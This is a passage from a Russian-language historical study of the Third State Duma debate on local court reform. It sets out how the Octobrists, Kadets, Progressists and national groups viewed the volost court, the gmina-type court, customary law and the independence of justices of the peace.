Кроме того, октябристская фракция в целях упрочения вышеуказанных принципов реформы местного суда, создания более прочных гарантий для независимости суда от администрации и, тем самым, обеспечения неприкосновенности личности и собственности внесла несколько весьма существенных новшеств в правительственный законопроект. Так, думская комиссия, состоявшая, в основном, из представителей господствующей в парламенте фракции, отвергла предложенное министерским проектом включение мирового суда в общую судебную организацию; возложила расходы на проведение реформы не на органы местного самоуправления, а на казну; отнесла к ведению местного суда иски, связанные с «интересами казны», чего правительственный проект также не предполагал; предложила сделать обязательным правило, согласно которому лица, задержанные полицией без требования мирового судьи, должны были быть освобождены или в течение суток препровождены к мировому судье, который в течение следующих суток обязан был либо освободить задержанного, либо вынести определение о задержании в целях пресечения уклонения от суда.
Однако отнюдь не вся октябристская фракция Думы была согласна с ключевыми тезисами законопроекта.
Прежде всего, значительная часть депутатов-октябристов (в основном, представлявших крестьянское сословие) высказывалась за учреждение вместо единоличного мирового суда коллегиального суда по типу гминного суда, существовавшего в пределах Привислинского и Западного краёв Российской империи (т.е., в основном, на территории российской части Польши). Такой суд включал в себя выборного председателя, имеющего определённый образовательный и имущественный ценз (как правило, местного помещика, зажиточного крестьянина, представителя сельской интеллигенции) и двух выборных заседателей, таковым цензам не отвечающих (как правило, местных крестьян). С одной стороны, в этом требовании крестьян выражался, конечно, крестьянский демократизм, поскольку появление такого суда связывалось с необходимостью введения бессословной волости, но с другой – такой суд должен был являться не бессословным, а скорее «полисословным», поскольку октябристы-крестьяне подчёркивали необходимость введения в состав суда двух представителей крестьянского сословия. На ограждение сословной обособленности крестьянства были направлены и контрпредложения депутатов-октябристов, касающиеся необходимости «деформализации» судопроизводства, расширения возможности применения в них норм обычного «крестьянского» права, сужения пространства для определённой законом процедуры судопроизводства.
В частности, депутат-крестьянин М.Д. Челышев выступал даже против правила обязательного привлечения свидетелей для доказательства противоправного деяния. В процедуре неукоснительного следования суда закону этими депутатами всячески сознательно подчёркивался и выпячивался элемент юридического формализма, якобы препятствовавший реализации принципа справедливости. В этих же видах некоторые депутаты предлагали до предела сузить канцелярскую сторону процесса, полагая, что, в противном случае, это сделает затруднительным обращение крестьян в суд ввиду его дороговизны, прежде всего вследствие расходов на адвокатскую помощь. В этом выразилось традиционное недоверие «почвы» к устоям «цивилизации», умиление якобы исконно присущими «простому народу» уникальными моральными качествами, позволяющими ему быть более справедливым, чем корыстолюбивые помещики и чиновники, а фактически – стремление сохранить некоторую обособленность крестьянства. Однако в отличие от представителей правых фракций октябристские «раскольники» не возражали, в принципе, против необходимости модернизации деревни, в том числе против стирания сословных различий. Речь шла о различных путях и темпах приспособления традиционалистской российской деревни к устоям индустриального общества.
Если основная часть фракции была за содействие быстрой ассимиляции «почвы» «цивилизацией», считая, что корпоративные перегородки в деревне уже размыты, а доверие к обычаю основательно расшатано, то меньшинство фракции, полагая обратное, выступало за более медленное приспособление «почвы» к ценностям «цивилизации» посредством постепенного синтеза почвеннических и цивилизационных устоев, путём неторопливого укрепления у крестьянства доверия к новым институтам, нормам, принципам, устоям.
Показательно, что другой сторонник гминного суда октябрист Д.А. Леонов полагал главной целью коллегиального суда по типу гминного с участием представителей крестьянства укрепление доверия к суду, «расположение» к нему всех слоёв населения, что, по его мнению, было невозможно, в случае, если под видом мирового суда «местный суд из рук чиновников МВД перейдёт в более умелые руки чиновников Минюста». Он предлагал даже уменьшение имущественного ценза, полагая, что избрание земствами гарантирует такие кандидатуры, «которые не будут колебать собственность». Иными словами, он считал, что чувство законности в народе надо «воспитывать», а не навязывать сверху чужеродными институтами, которые могли попасть под контроль бюрократии [2, ст. 1488].
Показательно, что глава комиссии Н.П. Шубинской выступал против предложения этих членов фракции по мотивам низкого авторитета непрофессионального суда у крестьян, ограниченности возможности применения обычая и покушения на основной «цивилизационный» устой – верховенство закона, неизбежное при поглощении профессионального судьи равноправными с ним заседателями. Этим он выражал мысль о том, что постепенное слияние обоих ценностно-нормативных устоев не нужно, прежде всего, самому крестьянству, поскольку традиционализм в деревне подорван и законность в деревне должно утверждать прямо и непосредственно.
Ещё более определённо намерение привнести начала верховенства закона путём синтеза почвеннических и цивилизационных устоев видно в предложении, высказанном рядом членов фракции (в частности, А.Е. Фаворским), о необходимости сохранения волостного суда при придании ему в качестве председателя мирового судьи. Волостной суд и обычное право, господствовавшее в нём, они понимали как способ нормирования жизни, связанный с определённой корпорацией, сословием, причём способ, наиболее эффективный для утверждения идеи «правды и справедливости», основанной на «крестьянской совести», «терпимости, ласковости, любвеобильности»; ценностей общинного коллективизма, патриархальной семьи а, в общем-то, сохранения внутрикорпоративного «примирения». Таким образом, Фаворский (несмотря на свое дворянство) выступает как безусловный адепт ценностей и менталитета традиционалистского крестьянства, сторонник консервации его устоев. «Консерватизм, обеспечивающий в своих правах и понятиях спокойное развитие наших государственных учреждений», представлялся ему наилучшим вариантом развития. Однако в отличие от правых этот консервативный октябрист понимал невозможность сохранения этого суда в неприкосновенности, полной корпоративной изоляции традиционализма крестьянства. Он признаёт деградацию волостного суда под влиянием «внешних» по отношению к почвенническим устоям причин: ускоренной урбанизации, расслоения деревни, роста преступности и т.д. Он признаёт неизбежность вторжения «цивилизации», в том числе и в деревню. Однако в отличие от октябристского большинства комиссии он полагал, что такое вторжение должно было быть амортизировано синтезом суда «почвы» и «цивилизации» – волостного и мирового судов. В случае монополии на отправление правосудия в деревне мирового суда с его формализованным судопроизводством, принципом безусловного следования писаному закону, «чуждым нравам и обычаям деревни» он опасался безнаказанности преступников, «удовлетворения требования правосудия более состоятельных классов» и отсутствия «примирения сторон», т.е. фактически раскола крестьянской традиционалистской корпорации [2, ст. 1481]. Взамен он предлагал её постепенное приспособление к модернизации «сверху», проводимое путём реформ (земской, полицейской, общественной). Достигнуть этого предполагалось за счёт введения особого порядка судопроизводства в деревне: сохранения волостного суда с увеличением подсудности до 50–100 руб. по гражданским делам и по уголовным делам – до ареста сроком на месяц; придания ему в качестве председателя мирового судьи, причём с упразднением в отношении его требований имущественного ценза и введения в апелляционную инстанцию – съезд мировых судей представителей от крестьянства, выбранных земствами. Итогом этих преобразований будет, по мнению Фаворского, с одной стороны, приближение «суда цивилизации» к населению, которое даст крестьянству «понятие о необходимости права» [2, ст. 1483] за счёт повышения авторитета «суда права», а с другой – позволит сохранить «чистоту правды и справедливости», отстоять интересы крестьян от кулачества, сохранить «корни нашей цивилизации, которая должна быть очищена от всякой дряни и мусора» [2, ст. 1485–1486].
Несколько иной точки зрения придерживался В.В. Хвощинский. Он являлся сторонником коллегиального суда, сочетающего мирового судью с заседателями из крестьян. Будучи более принципиальным и последовательным, чем Фаворский, противником разделения страны на «народ» и «бар» [2, ст. 1823], он, тем не менее, полагал, что «судьи – чиновники», чуждые крестьянской среде не «разовьют понятия о праве в народе», и что поэтому народу нужны судьи, «близкие ему по культуре и понятиям», знающие его обычаи и «жизненные условия» [2, ст. 1824]. Правда, он считал, что правовое воспитание крестьянства должно последовательно происходить на базе применения писаного законодательства. Потому он думал, что дела, «не терпящие отлагательства» и «наиболее сложные», мировой судья должен рассматривать единолично. Только дела, «не требующие быстроты», должны были разрешаться коллегией, состоящей из мирового судьи в качестве председателя и двух волостных судей, которые будут выбираться крестьянами в каждой волости и участвовать в судебных заседаниях при объезде мировыми судьями своего участка.
Ещё более умеренная точка зрения характерна для таких критиков октябристского в своей основе проекта комиссии, как А.Ф. Мейендорф и Г.В. Скоропадский. Характерно, что наряду с констатацией особого традиционалистского правового уклада российской деревни, осознания того, что нельзя «организм правосудия… построить рационалистически, отвлекаясь от условий места и времени, от типичных черт данной страны» [2, ст. 1735], для них характерно уже безусловное признание того, что «цивилизация» наступает, и все усилия «почвы» сдержать её обречены на провал, поскольку индустриальная модернизация России – не случайный и не наносной элемент, он уже стал реальностью, к которой надо приспособить и институты правосудия. «Этого требует не наш рассудок, этого требует сама жизнь», этого требует «исторический ход событий», «как бы вы не идеализировали патриархальный быт и натуральное хозяйство, эти явления отжили свой век», – в таких выражениях преподносит этот тезис Мейендорф [2, ст. 1736]. Осознание того, что «почве» трудно примириться с тем, что не вписывается в её систему ценностей, но что в определённой степени это неизбежно и прогрессивно, пронизывает весь пафос его речи – «весь гражданский процесс нашего времени построен на том, чтобы давать более хитрому, более ловкому человеку победу над более добросовестным и простым» [2, ст. 1735]. Для него, таким образом, характерно понимание того, что надо не отгораживаться от процессов модернизации, а искать формы приспособления его под национальные нужды. Но, с другой стороны, он и его сторонники признавали, что формы такого приспособления неясны ввиду отсутствия отечественного и зарубежного опыта, а степень традиционализма крестьянства России неодинакова, и поэтому найти достаточно адекватные и эластичные формы синтеза государственным институтам практически невозможно. Они трактовали необходимость сохранения коллегиального суда с участием крестьянства лишь как средство для «психологического удовлетворения крестьянства» в «патриархальных местностях», в целях, прежде всего, сохранения социального мира и постепенного приобщения их к ценностям «цивилизации» (правовому строю, равенству всех перед законом и т.д.). Поэтому их поправки сводились к тому, чтобы волостной суд «умер бы своей смертью» [2, ст. 1452], сохраняясь лишь как суд третейский, факультативный, необязательный. Они предполагали предоставить волостным старшинам или особо избранным «добросовестным» право предварительного разбора исков ценой не свыше 30 руб. при условии добровольного согласия сторон и личной их явки (решение должно было выноситься письменно и быть подписано сторонами) при предоставлении возможности недовольной стороне в течении четырёх недель обратиться в мировой суд.
Исходя из вышеизложенного, можно сказать, что октябристы выступали, в общем, сторонниками идеи правового государства, модернизации правового строя России в целом и российской деревни в частности, причём «сверху» – посредством деятельности авторитарной по сути власти. Вместе с тем, они понимали необходимость приспособления нравов и обычаев, традиций населения к требованиям и наличным условиям российского общества. Если правые были, по сути, реакционерами, то октябристы – либеральными консерваторами, не сомневавшимися в необходимости постепенного введения модернизированных правовых институтов. «Центр» фракции, в целом, поддерживал правительственную позицию контроля над мировой юстицией со стороны государства, земств, и цензовых элементов общества, лишь несколько корректируя её в сторону бóльшей независимости судебной власти и мировой юстиции от администрации. Их целью являлась не консервация почвеннических устоев, как у правых, а воспитание народа в духе идеалов правового государства. Отличия руководства и большинства фракции («центра») от их оппонентов («правого крыла» фракции) состояли в том, что если большинство полагало, что «почва», традиционалистские устои не имеют прочной опоры деревне и правовое воспитание крестьянства могло произойти путём уничтожения почвеннических устоев «сверху», то оппоненты настаивали на неготовности «почвы» воспринять пока враждебный ей мир «цивилизации». Поэтому они выступали за постепенный синтез суда «почвы» и суда «цивилизации». В трактовке степени такого синтеза они не были едины, однако выступали в отличие от правых за ассимиляцию устоев почвы цивилизацией, за поглощение крестьянского традиционализма правовым строем, а не наоборот. В этом выразилось характерное для представителей консервативного либерализма стремление постепенно и крайне осторожно приспособить российскую деревню к модернизации, укрепив, прежде всего, доверие к её устоям. В степени этой постепенности и осторожности выразились довольно значительные внутрифракционные различия.
Кадетская фракция и примыкавшие к ней группировки (прежде всего, прогрессисты и польское коло), в целом, подержали идею законопроекта. Вместе с правительством и подавляющей частью октябристской фракции представители партии народной свободы категорически выступали против сохранения местного коллегиального суда. Они единогласно возражали как против волостного суда (безразлично – прежнего или реформированного), так и против предлагаемого некоторыми правыми, националистами, октябристами и социалистами проекта «суда по типу гминного суда». Во многом их аргументация повторяла аргументацию министра юстиции И.Г. Щегловитова как представителя правительства и докладчика думской комиссии, принадлежавшего к октябристской фракции – Н.П. Шубинского. Как и они, депутаты-кадеты разоблачали: низкий нравственный, образовательный, культурный, правовой уровень членов волостного суда; отправление обязанностей судьями, в сущности, в порядке повинности, что, в свою очередь, влекло за собой «хозяйничанье» в суде писаря; прямую зависимость его от администрации в лице земского участкового начальника; вызванный этим крайне низкий авторитет волостного суда в среде самого крестьянства. Наконец, в их лице нашёл полное понимание и основной тезис авторов и сторонников законопроекта, оправдывавший необходимость ликвидации волостного суда необходимостью преодоления сословной обособленности крестьянства, ликвидации сословной розни. Однако кадеты в констатации причин необходимости ликвидации волостного суда делали более заметный акцент на приспособление суда к социально-экономическим требованиям нового индустриального общества, к тем изменениям в социальной и экономической жизни деревни, которые влекут за собой появление частной собственности и рыночного типа ведения хозяйства. Поэтому в отличие от представителей правительства, октябристов они не считали, что волостной суд необходимо ликвидировать потому, что он «необходим кулакам и мироедам».
Как и представители правительства и октябристского большинства комиссии кадеты выступали против «суда по типу гминного суда» (или близкого ему проекта учреждения мирового суда с двумя заседателями из крестьян). Причём зачастую они повторяли аргументы инициаторов законопроекта, соглашаясь, что такой суд будет существенно дороже, технически сложнее, медлительнее, что заседатели в таких судах «бесполезны» и даже «вредны», поскольку создадут количественный перевес над судьёй, выносящим решение на строгом основании закона, превратившись в балласт судопроизводства. Однако представители фракции сделали здесь сознательный акцент на то, что такое устройство суда не позволит добиться главного, что отличает судью – независимости, самостоятельности, порождающей чувство ответственности. По словам Ф.И. Родичева, такой суд не будет воспитывать «чувство долга, и смелость правовой мысли» судьи [2, ст. 1696], что и обеспечит подлинную независимость суда не только от администрации, но и от грешащего правовым нигилизмом традиционалистского крестьянства. Поэтому депутаты от кадетов считали, что гминный суд не подходит к введению на всей территории России не потому, что он, по словам министра юстиции, был чисто политическим институтом, учреждённым с целью противостоять враждебным для России «шляхетским тенденциям», и даже не потому, что заседатели, по мнению докладчика комиссии, выступят всего лишь в практически бесполезной роли юридических консультантов по вопросам местных обычаев, а потому, что гминный суд действует в районах, где традиционалистские устои, характерные для российской деревни, её правовой нигилизм и сословная обособленность ушли в прошлое и, следовательно, нет угрозы поглощения суда по праву судом по совести, обычаю, указанию начальства и т.д. Гминный суд может быть введён в российских губерниях лишь тогда, «когда вы создадите людей, защищающих своё право и в нём свою отчизну» [2, ст. 1698], – так аргументировал свою мысль Ф.И. Родичев.
Между прочим, правоту воззрений кадетов подтвердил и представитель от праволиберального польского коло А.И. Парчевский, отстаивающий необходимость дальнейшего распространения и реформирования гминного суда, но только на территории бывшей Польши, утверждая, что такой суд является, в первую очередь, национальным польским судом, укоренённым там в течение не менее столетия, и что «в Польше только польский суд может исполнять задачи правосудия». Кроме того, он обратил внимание на то обстоятельство, что гминный суд по своей природе не всесословный (что фактически предлагали правые и часть октябристов), а бессословный. Он утверждал, что «лавники» (заседатели) не несостоятельны именно потому, что зачастую ими становятся образованные помещики, городская интеллигенция и т.д.; что гминный суд не вносит «классовых интересов и классовых страстей в дело правосудия». Наконец, ярый сторонник гминного суда категорически выступил против использования в нём обычая, поскольку, на его взгляд, «крестьянские обычаи составляют пережиток отжившего времени» [2, ст. 1517–1527]. Очевидно, им обращается внимание на то, что в силу наличия в Польше мощного среднего класса, отсутствия сословных перегородок, более длительного отсутствия крепостничества, присутствия традиций городского местечковского, слободского самоуправления, более высокого культурного и материального уровня населения традиционалистские устои там основательно поколеблены, в населении воспитан довольно высокий уровень правовой культуры, правосознания. Поэтому в Польше гминный суд выполняет совершенно иные задачи, наполнен абсолютно иным, «модеризационным» содержанием, нежели предполагаемый его аналог в России.
Поддержали кадетское неприятие идеи коллегиального суда по типу гминного и прогрессисты, однако с компромиссной оговоркой, что такой суд можно допустить как «меньшее зло» в интересах прохождения законопроекта только в тех местах, где нет земств и судьи назначены [2, ст. 1528], поскольку сторонники тактики компромисса предпочитали выборный коллегиальный суд суду бюрократическому.
Наконец, фракция, безусловно, поддержала и такую мотивировку необходимости введения нового типа суда, как невозможность руководствоваться в суде исключительно обычаем. Они были согласны с инициаторами законопроекта в том, что применение в судах обычая порождает произвол, неравенство, препятствует реализации главного принципа современного правосудия – неукоснительное следования суда закону. Однако кадеты делали основной упор на то, что право в гораздо большей степени соответствует новым социально-экономическим отношениям, утверждающимся в деревне, и обладает огромным воспитательным, цивилизующим значением. Кадетские ораторы утверждали, что обычное право должно, безусловно, уступить место «правовой сфере» [2, ст. 1496], что обычай в силу смешения гражданских и уголовных норм и наказаний представляет собой «пережитки архаики» [2, ст. 1514], что обычаю не хватает «гибкости и эластичности», необходимой для приспособления права к новой социально-экономической ситуации, поскольку он «целесообразен в условиях патриархального быта» и потому представляет «препятствие к тому, чтобы жизнь, которая пробивается везде, могла бы в достаточной степени найти защиту в праве» [2, ст. 1761]. Причём кадетские ораторы, в частности видный юрист М.С. Аджемов, обратили внимание, что одним из главных инструментов, кардинально изменяющих социально-экономических отношения в деревне, стало введение крестьянской частной собственности на землю. Поэтому они упрекали правое крыло Думы в том, что его ораторы хотят усесться на двух стульях – с одной стороны, разрушить общину и укрепить «личную» крестьянскую собственность, а с другой – сохранить сословную обособленность крестьянства, его правовой нигилизм в своих идеологических и классовых целях. Упрекали в том, что они препятствовали адекватному правовому регулированию тех условий, которые «законодатель должен предусмотреть», протестуя против адекватной правовой защиты вводимой ими частной собственности в виде закона. Ф.И. Родичев, утверждал, что «правосознание, согласно которому земля считалась божьей и находящейся в семейном владении» уничтожено столыпинской аграрной реформой при содействии самой Государственной думы. Поэтому обычай как отражение идей людей и групп, «не верящих в право», носителей традиционалистского сознания отжил свой век. Родичев обратил внимание на то, что в условиях капиталистического развития «обычай делается несправедливым потому, что он не соответствует развившейся жизни», что народ уже не живёт «обособленной жизнью и другими правовыми понятиями, чем другие сословия» [2, ст. 1702], что народ поэтому ждёт воскресения «правового суда», лучшее доказательство чему – увеличение сумм исков крестьянами, желавшими сначала передать дела в мировой суд, а после контрреформы – в окружной, которые судили по закону, а не по обычаю. Вместе с тем, он признавал, что позиции аграрного общества, традиционализма, «почвы» в крестьянской среде ещё очень сильны. Но именно поэтому необходимо уничтожение волостного суда – для того, чтобы, «проводить в жизнь культурные начала», «вытравливать и традицию и предание и воспитание» людей, которые «не привыкли защищать свою мысль» [2, ст. 1704]. Главной задачей правового суда в лице мирового судьи является, с его точки зрения, «восстановление потрясённой и уничтоженной в народе веры в окончательное торжество права» [2, ст. 1698], упрочение авторитета судьи, которое будет способствовать восстановлению авторитета права, и ликвидация обычая, которая посодействует вытравливанию «предрассудка, что для судьи есть барин, а есть мужик» [2, ст. 1698–1707]. Тем самым торжеством права как цивилизационного института предполагалось воспитание правосознания народа, а не изоляция почвы в новых условиях социально-экономического прогресса (позиция правых) и не навязывание правовых начал «сверху» (позиция правительства и большинства октябристов). Оба этих варианта, по мнению кадетов, равным образом вели страну в тупик, увеличивали разрыв между «почвой» и «цивилизацией», расшатывающий социальную стабильность и препятствовавший дальнейшей модернизации.
Однако кадеты не ограничились одобрением законопроекта, пусть и по несколько отличавшимся от правительства и октябристского большинства комиссии мотивам. В соответствии со своей идеологией модернизации они предложили ряд существенных поправок. Во-первых, они касались необходимости сужения сферы применения обычая и большей формализации судопроизводства с целью придания ему «правового характера». Ряд кадетов (Ф.И. Родичев и Г.Р. Килевейн), соглашаясь с октябристами и правительством, полагали, что обычное право в семейных и наследственных делах необходимо оставить из-за несовершенства гражданского законодательства, однако настаивали на придании ему «обязательной силы» закона. Выразив уверенность, что в этом случае профессиональный судья разберётся в нём лучше, нежели судья волостной, они утверждали необходимость выработки основных решений мирового суда не на основе обычая, а на «основных началах права». А.А. Савельев же вообще полагал, что наследственное право исчезнет с утверждением частной крестьянской собственности на землю, а брачно-семейное обычное право непригодно, поскольку представляет собой характерное для традиционализма «полнейшее смешение гражданских, уголовных и нравственных прав». Он соглашался, в принципе, с тем, что некоторые обычаи, основанные на «трудовом начале» придётся оставить, однако предлагал ввести новые, более формализованные правила их доказывания (например, постановления сходов, решения волостных судов за ряд лет и т.д.). М.С. Аджемов, вторя ему, полагал, что «сам обычай в силу коррекции совестью судей поколеблен и находится в состоянии хаотическом» [2, ст. 1514]. Он предложил изменить толкование в законопроекте применения обычая в мировом суде. Правительственный законопроект предполагал в случаях, разрешённых законом (а закон, носящий, кстати сказать, сословный характер, такую возможность предоставлял достаточно широко, разрешая и аналогию закона), применять обычай без ссылки сторон, возлагая на судью принятие мер к установлению неизвестных для суда обычаев. Проект комиссии, несколько ограничивший область его действия, предлагал применять обычай в случаях, разрешённых законом, уже только по ссылке на него сторон, но в случаях, положительно не разрешённых законом, даже обязывал судей самим применять обычай. Аджемов же, утверждая, что «закон должен иметь первенствующее значение», предлагал в обязательственных отношениях отдавать предпочтение закону перед обычаем, а в области регулирования семейно-наследственных дозволить применение обычая только и исключительно «в силу закона». Кроме того, юрист предложил и дальнейший путь решения проблемы объективного наличия обычая в крестьянской среде – использование некоторых положений крестьянского обычного права при составлении гражданского кодекса, тем самым отдавая предпочтение законодательству перед обычаем, признавая, однако, необходимость «поглощения обычая законом» с учётом востребованности обычая. Кадеты тем самым нащупали оптимальный путь правовой модернизации России – путь слияния правовых воззрений «почвы» и «цивилизации» в писаном законе, отражения в присущем для индустриального общества нормативном законодательстве прогрессивных моментов крестьянского правосознания.
Не согласились кадеты и с некоторым ограничением принципа равенства всех перед законом и судом, предполагаемым законопроектом. Прежде всего, по мнению кадетов, он заключался в отказе распространить действие законопроекта на Сибирь и ряд других окраин государства. Кадетские депутаты от Сибири (А.А. Скороходов, В.А. Караулов, К.И. Молодцов) настаивали на том, что как раз население Сибири чрезвычайно нуждается в благах всесословного правового суда, «доросло» до понимания его необходимости, поскольку именно Сибирь являлась наиболее динамически развивающимся по буржуазному пути краем, поскольку она была районом, население и экономический рост которого увеличивались именно вследствие мероприятий столыпинской аграрной реформы, а следовательно, наиболее нуждающимся и приспособленным для судебной реформы. Они обратили внимание, таким образом, на то, что Сибирь являлась на тот период одним из наименее традиционалистских регионов России, областью, где и в деревне преобладал мелкий частный собственник, служащий социальной базой для модернизации, в том числе и правовой. В связи с этим депутаты от Сибири, в числе которых были, в основном, кадеты, выступили даже с отдельным обращением к Думе, содержащим призыв к тому, чтобы правительство безотлагательно внесло в Государственную думу законопроект о реформе местного суда в Сибири. Таким образом, они увязывали особенности социально-экономического развития, появление новых ценностей и идеалов населения с необходимостью правовой модернизации. Кроме того, кадеты (В.А. Караулов, Л.Н. Нисселович) ополчились на предложение, высказанное представителями центра, направленное против распространения реформы на еврейское население империи, обращая внимание как раз на то, что там, где нет равенства перед законом, «нет и конституционного строя» [2, ст. 1510], обвиняя сторонников поправки в «юдофобстве», немотивированной «глубокой ненависти к еврейскому племени» [2, ст. 1838]. Однако для депутатов, которые служили рупором традиционализма, ненависть к еврейству была, конечно, не только «болезненным состоянием», «низменной страстью», по выражению депутата Л.И. Нисселовича. Скорее здесь имело место характерное для «почвы» нерациональное неприятие этноса, чей менталитет основан на ценностях цивилизации, на приспособлении, как говорил Л.Н. Гумилёв, к условиям городского ландшафта, к культуре урбанизма, которую впитали не только представители низов, но и верхов общества, использовавшие антиеврейскую риторику в качестве инструмента воздействия на низы. Неприятие этой риторики лишний раз демонстрирует позицию кадетов как подлинно модернизаторскую, характеризует их идеологические устои как антитрадиционалистские и подлинно демократические.
Показательно, что к кадетскому требованию распространить мировую юстицию на национальные окраины примкнули близкие к кадетам национальные депутаты и группировки Думы. Прогрессист И.Н. Ефремов, как представитель Области войска Донского, категорически настаивал, упирая на поддерживающее его общественное мнение Дона, на немедленном распространении мировой юстиции на донской регион. Х.Б.Г.Б.О. Хас-Мамедов от мусульманской группы выдвинул предложение о распространении действия законопроекта на мусульманские национальные окраины, поскольку назначенные судьи, как правило, не были знакомы ни с местным языком, ни с местными обычаями [2, ст. 1447–50]. Ему вторил и депутат И.С. Монтвилл от польско-литовско-белорусской группы, утверждая, что в силу в силу незнания местных обычаев и языков назначенные судьи никакого авторитета у местного населения не имеют. Причём все они категорически потребовали перед проведением реформы ввести на окраинах бессословное, реформированное земство, дабы исключить падение авторитета суда из-за сословной розни и угрозы, создающейся по принципу равенства всех перед судом. И.Н. Ефремов всячески убеждал Думу в необходимости «расширить избирательные права населения» и даже предполагал от имени прогрессистов формулу перехода к очередным делам, в которой настаивал на «открытии доступа к занятию должности мирового судьи всеми лицами без сословных и имущественных различий», отклонённую Думой.
Объектом критики кадетов в процессе обсуждения законопроекта стала и недостаточная, на их взгляд, степень независимости местного суда. Именно в этом атрибуте кадеты видели главный «залог правового строя» и пытались улучшить законопроект созданием гарантий для него более прочных, нежели предполагаемых законопроектом. Так, видный кадетский депутат – юрист К.К. Черносвитов выступил за избрание председателя съезда мировых судей самими мировыми судьями. Он высказался против предполагаемого законопроектом назначения его министром юстиции, опасаясь, что тем самым возникнет почва для «искусственной борьбы» между административной и судебной властями. Черносвитов считал, что это «далеко не в интересах правосудия» [2, ст. 1148], поскольку председатель будет согласно законопроекту вправе и обязан, осуществляя надзор за судьями округа, фактически жаловаться на них представителю правительства – министру юстиции. Кадетский оратор отстаивал полную независимость суда от правительственной власти как принцип, который надо соблюдать строжайшим образом. Он отверг мотивировку октябристского докладчика комиссии Н.П. Шубинского, что такое положение обеспечит компромисс с правительством и, следовательно, облегчит прохождение законопроекта, а также гарантирует должный уровень квалификации председателя суда, утверждая, что такую квалификацию председателя вполне обеспечит обязательность для него высшего юридического образования. Ф.И. Родичев, также отстаивавший необходимость закрепить в будущем законе положение о выборности председателя, упирал на необходимость упрочить «свободу правового творчества» для судей, создать посредством гарантий, предоставляемых данным законопроектом местных судей, которые «уйдут… с чиновничьей лестницы», превратятся в лиц, «карьеры не делающих и начальства над собой не имеющих» [2, ст. 1708]. Таким образом, кадеты были более последовательными проводниками антитрадиционалистского принципа независимости суда от администрации, чем правительство и октябристы, причём так же делая акцент на постепенное воспитание независимого правосознания судей.
Выступили кадеты и за большую демократизацию института мирового суда. Прежде всего, они высказались за полную отмену имущественного ценза для занятия должности мирового судьи. Этот принцип упорно отстаивали и представители правительства и октябристы, мотивируя это тем, что наличие недвижимой собственности в районе проживания выборного судьи якобы обеспечит последнему знание местных обычаев, специфики и проблем, а также «нравственную пригодность» к занятию судейской должности. Консервативные либералы отстаивали принцип исключительной принадлежности политических прав и свобод собственникам, а представители правительства – «местному землевладельческому классу», основной опоре режима на местах – поместному дворянству. Как представители «нового либерализма» кадетские ораторы справедливо полагали, что «гарантия знакомства с местными обычаями – не в местной недвижимости, а в выборном начале» [2, ст. 1108], а нравственную оценку судьи никак нельзя увязывать с наличием собственности. Представители фракции вскрыли и причину отстаивания ценза правительством и правыми депутатами – недоверие к «третьему элементу» земств – социальной базе модернизации и левого либерализма, призывая представителей октябристов, от которых во многом зависело принятие законопроекта не видеть в них своих противников. Наконец, кадеты видели вред ценза в неизбежном, по их мнению, недоверии населения, прежде всего, крестьянского, к будущему местному суду. В случае сохранения ценза, по мнению представителей фракции, местный суд останется в их глазах «судом бар» и не обеспечит главного, чего добивалась фракция, – правового воспитания населения в духе преодоления правового нигилизма, волюнтаризма, недоверия к праву, характеризующих почвеннический традиционализм, с которым кадеты упорно и последовательно боролись. Исходя из этого, кадеты предлагали отказаться от избрания мировых судей существующими земствами, которые именно в силу наличия имущественного ценза оставались узко-сословными органами, и немедленно реформировать их устройство на принципах демократического избирательного права (всеобщего, равного, прямого при тайном голосовании). В этих же видах кадетский оратор К.К. Черносвитов предложил уменьшить ценз оседлости, который равнялся пяти годам, мотивируя этот тем, что он делает должность недоступной, прежде всего, для крестьян, получивших высшее образование. Таким образом, и здесь проявлялось желание кадетов не изолировать «почву» (позиция правых) и не втягивать её в «цивилизацию» «давлением сверху» (позиция правительства и октябристов), а органично вовлекать в модернизационные процессы, используя для этого сами традиционалистские социальные элементы.
Кроме того, кадетов волновала возможность отстаивания законности судом и по отношению к власти, в связи с чем К.К. Черносвитов предложил исключить из числа лиц, которые не могли избираться на должности мировых судей, приговорённых к заключению за политические преступления. Показательно, что эти предложения кадетов были целиком и полностью поддержаны представителями прогрессистов.
Предложили кадеты и ряд поправок, направленных на расширение подсудности суда за счёт, прежде всего, дел «против порядка управления» и дел, возникающих «по поводу исполнения должностных обязанностей». Их изъятие из сферы действия законопроекта, по мнению кадетов, провоцировало бесконтрольность административно-полицейских структур и наносило удар по доверию населения к институтам, призванным поставить на место власти административного приказа власть права.
Наконец, необходимо упомянуть о предложении кадетов (законопроект комиссии предполагал лишь сужение такой возможности, предусмотренной проектом правительства) для создания гарантий соблюдения принципа неприкосновенности личности, вовсе исключить из законопроекта возможность назначения наказания на основании так называемых «судебных приказов», которые в ряде случаев позволяли «в порядке неотложности» выносить приговоры в отсутствие обвиняемого. Здесь также предотвращение возможности чиновничьего произвола и необходимость укрепления доверия населения к власти права в будущем суде выдвигались кадетами на первый план.
Итак, участие кадетов, польского коло и прогрессистов в обсуждении законопроекта о преобразовании местного суда выразилось в том, что они поддержали прогрессивные положения законопроекта и поправки, преимущественно октябристской думской комиссии, направленные на ликвидацию устаревших и архаичных судов – волостного суда и суда земского участкового начальника (сохранявших такие традиционалистские устои, как сословный характер местного суда, господство в нём земельной аристократии, обычного права). Поддержали они и восстановление в России института мировой юстиции, свободной от сословных начал, «безответственной коллегиальности» и господства обычного права. Не ограничившись этим, они выступили гораздо более последовательными сторонниками правовой модернизации, нежели октябристы и тем более правительство. Это выразилось в требованиях: предельной минимизации сферы действия обычного права и организации его «поглощения» позитивным законодательством; ликвидации ограничений принципа равноправия предусматривавшимся законопроектом; создания гарантий независимости местного суда от административной власти Минюста; демократизации мировой юстиции. Таким образом, леволиберальные фракции полагали необходимым проведение юридической модернизации и построения основ правового государства более решительно и последовательно, нежели думский центр, не делая в ходе её проведения резких различий между российской деревней и городом, окраинами России и её «сердцевиной». Понимая, что правовое «воспитание» российской «почвы» неизбежно, они видели её в радикальном переустройстве судебно-правовой системы России, организации быстрого и в то же время по возможности органичного поглощения её «цивилизацией».
